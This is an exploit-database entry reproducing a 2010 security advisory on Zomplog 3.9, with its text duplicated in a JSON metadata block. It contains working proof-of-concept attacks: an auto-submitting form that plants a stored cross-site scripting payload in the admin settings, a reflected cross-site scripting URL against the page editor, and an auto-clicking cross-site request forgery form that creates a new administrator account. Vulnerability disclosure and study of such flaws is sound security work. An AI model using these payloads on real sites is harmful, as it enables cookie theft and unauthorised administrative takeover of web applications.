ID 1337DAY-ID-14615 Type zdt Reporter High-Tech Bridge Modified 2010-10-28T00:00:00
Description
Exploit for php platform in category web applications
===============================================
Zomplog 3.9 Multiple XSS & XSRF Vulnerabilities
===============================================
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zomplog_1.html
Product: Zomplog
Vendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )
Vulnerable Version: 3.9 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "/admin/settings_menu.php" script to properly sanitize user-supplied input in "about" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/settings_menu.php" method="post" enctype="multipart/form-data" name="main">
<input type="hidden" name="Submit" value="Submit ››">
<input type="hidden" name="search" value="1">
<input type="hidden" name="teasers" value="1">
<input type="hidden" name="archive" value="1">
<input type="hidden" name="latestentries" value="1">
<input type="hidden" name="nr_entries" value="10">
<input type="hidden" name="latestcomments" value="1">
<input type="hidden" name="nr_comments" value="10">
<input type="hidden" name="categories" value="1">
<input type="hidden" name="authors" value="1">
<input type="hidden" name="pages" value="1">
<input type="hidden" name="meta" value="1">
<input type="hidden" name="login" value="1">
<input type="hidden" name="use_join" value="1">
<input type="hidden" name="powered" value="1">
<input type="hidden" name="about" value='about"><script>alert(document.cookie)</script>'>
<input type="hidden" name="customfield" value="customfield">
</form>
<script>
document.main.submit();
</script>
-----------------------------------------------------------------------------------------------------------------
Vulnerability ID: HTB22644
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zomplog_2.html
Product: Zomplog
Vendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )
Vulnerable Version: 3.9 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "/admin/editor_pages.php" script to properly sanitize user-supplied input in "id" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/admin/editor_pages.php?id=1'"><script>alert(document.cookie)</script>
-----------------------------------------------------------------------------------------------------------------
Vulnerability ID: HTB22645
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_zomplog.html
Product: Zomplog
Vendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )
Vulnerable Version: 3.9 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "/admin/users.php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/users.php" method="post">
<input type="hidden" name="login" value="newuserlogin">
<input type="hidden" name="password" value="password">
<input type="hidden" name="password2" value="password">
<input type="hidden" name="admin" value="1">
<input type="submit" id="btn" name="submit" value="Submit ››">
</form>
<script>
document.getElementById('btn').click();
</script>
# 0day.today [2018-01-03] #
{"id": "1337DAY-ID-14615", "type": "zdt", "bulletinFamily": "exploit", "title": "Zomplog 3.9 Multiple XSS & XSRF Vulnerabilities", "description": "Exploit for php platform in category web applications", "published": "2010-10-28T00:00:00", "modified": "2010-10-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/14615", "reporter": "High-Tech Bridge", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-03T23:11:18", "viewCount": 6, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/14615", "sourceData": "===============================================\r\nZomplog 3.9 Multiple XSS & XSRF Vulnerabilities\r\n===============================================\r\n\r\nReference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zomplog_1.html\r\nProduct: Zomplog\r\nVendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )\r\nVulnerable Version: 3.9 and probably prior versions\r\nVendor Notification: 13 October 2010\r\nVulnerability Type: Stored XSS (Cross Site Scripting)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Medium\r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)\r\n \r\nVulnerability Details:\r\nUser can execute arbitrary JavaScript code within the vulnerable application.\r\n \r\nThe vulnerability exists due to failure in the \"/admin/settings_menu.php\" script to properly sanitize user-supplied input in \"about\" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n \r\nAn attacker can use browser to exploit this vulnerability. The following PoC is available:\r\n \r\n<form action=\"http://host/admin/settings_menu.php\" method=\"post\" enctype=\"multipart/form-data\" name=\"main\">\r\n<input type=\"hidden\" name=\"Submit\" value=\"Submit \u00e2\u20ac\u00ba\u00e2\u20ac\u00ba\">\r\n<input type=\"hidden\" name=\"search\" value=\"1\">\r\n<input type=\"hidden\" name=\"teasers\" value=\"1\">\r\n<input type=\"hidden\" name=\"archive\" value=\"1\">\r\n<input type=\"hidden\" name=\"latestentries\" value=\"1\">\r\n<input type=\"hidden\" name=\"nr_entries\" value=\"10\">\r\n<input type=\"hidden\" name=\"latestcomments\" value=\"1\">\r\n<input type=\"hidden\" name=\"nr_comments\" value=\"10\">\r\n<input type=\"hidden\" name=\"categories\" value=\"1\">\r\n<input type=\"hidden\" name=\"authors\" value=\"1\">\r\n<input type=\"hidden\" name=\"pages\" value=\"1\">\r\n<input type=\"hidden\" name=\"meta\" value=\"1\">\r\n<input type=\"hidden\" name=\"login\" value=\"1\">\r\n<input type=\"hidden\" name=\"use_join\" value=\"1\">\r\n<input type=\"hidden\" name=\"powered\" value=\"1\">\r\n<input type=\"hidden\" name=\"about\" value='about\"><script>alert(document.cookie)</script>'>\r\n<input type=\"hidden\" name=\"customfield\" value=\"customfield\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n \r\n \r\n-----------------------------------------------------------------------------------------------------------------\r\n \r\nVulnerability ID: HTB22644\r\nReference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zomplog_2.html\r\nProduct: Zomplog\r\nVendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )\r\nVulnerable Version: 3.9 and probably prior versions\r\nVendor Notification: 13 October 2010\r\nVulnerability Type: XSS (Cross Site Scripting)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Medium\r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)\r\n \r\nVulnerability Details:\r\nUser can execute arbitrary JavaScript code within the vulnerable application.\r\n \r\nThe vulnerability exists due to failure in the \"/admin/editor_pages.php\" script to properly sanitize user-supplied input in \"id\" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n \r\nAn attacker can use browser to exploit this vulnerability. The following PoC is available:\r\nhttp://host/admin/editor_pages.php?id=1'\"><script>alert(document.cookie)</script>\r\n \r\n \r\n-----------------------------------------------------------------------------------------------------------------\r\n \r\nVulnerability ID: HTB22645\r\nReference: http://www.htbridge.ch/advisory/xsrf_csrf_in_zomplog.html\r\nProduct: Zomplog\r\nVendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )\r\nVulnerable Version: 3.9 and probably prior versions\r\nVendor Notification: 13 October 2010\r\nVulnerability Type: CSRF (Cross-Site Request Forgery)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Low\r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)\r\n \r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the \"/admin/users.php\" script to properly verify the source of HTTP request.\r\n \r\nSuccessful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n \r\nAttacker can use browser to exploit this vulnerability. The following PoC is available:\r\n \r\n<form action=\"http://host/admin/users.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"login\" value=\"newuserlogin\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"password2\" value=\"password\">\r\n<input type=\"hidden\" name=\"admin\" value=\"1\">\r\n<input type=\"submit\" id=\"btn\" name=\"submit\" value=\"Submit \u00e2\u20ac\u00ba\u00e2\u20ac\u00ba\">\r\n</form>\r\n<script>\r\ndocument.getElementById('btn').click();\r\n</script>\r\n\r\n\n\n# 0day.today [2018-01-03] #", "_state": {"dependencies": 1645249026}}
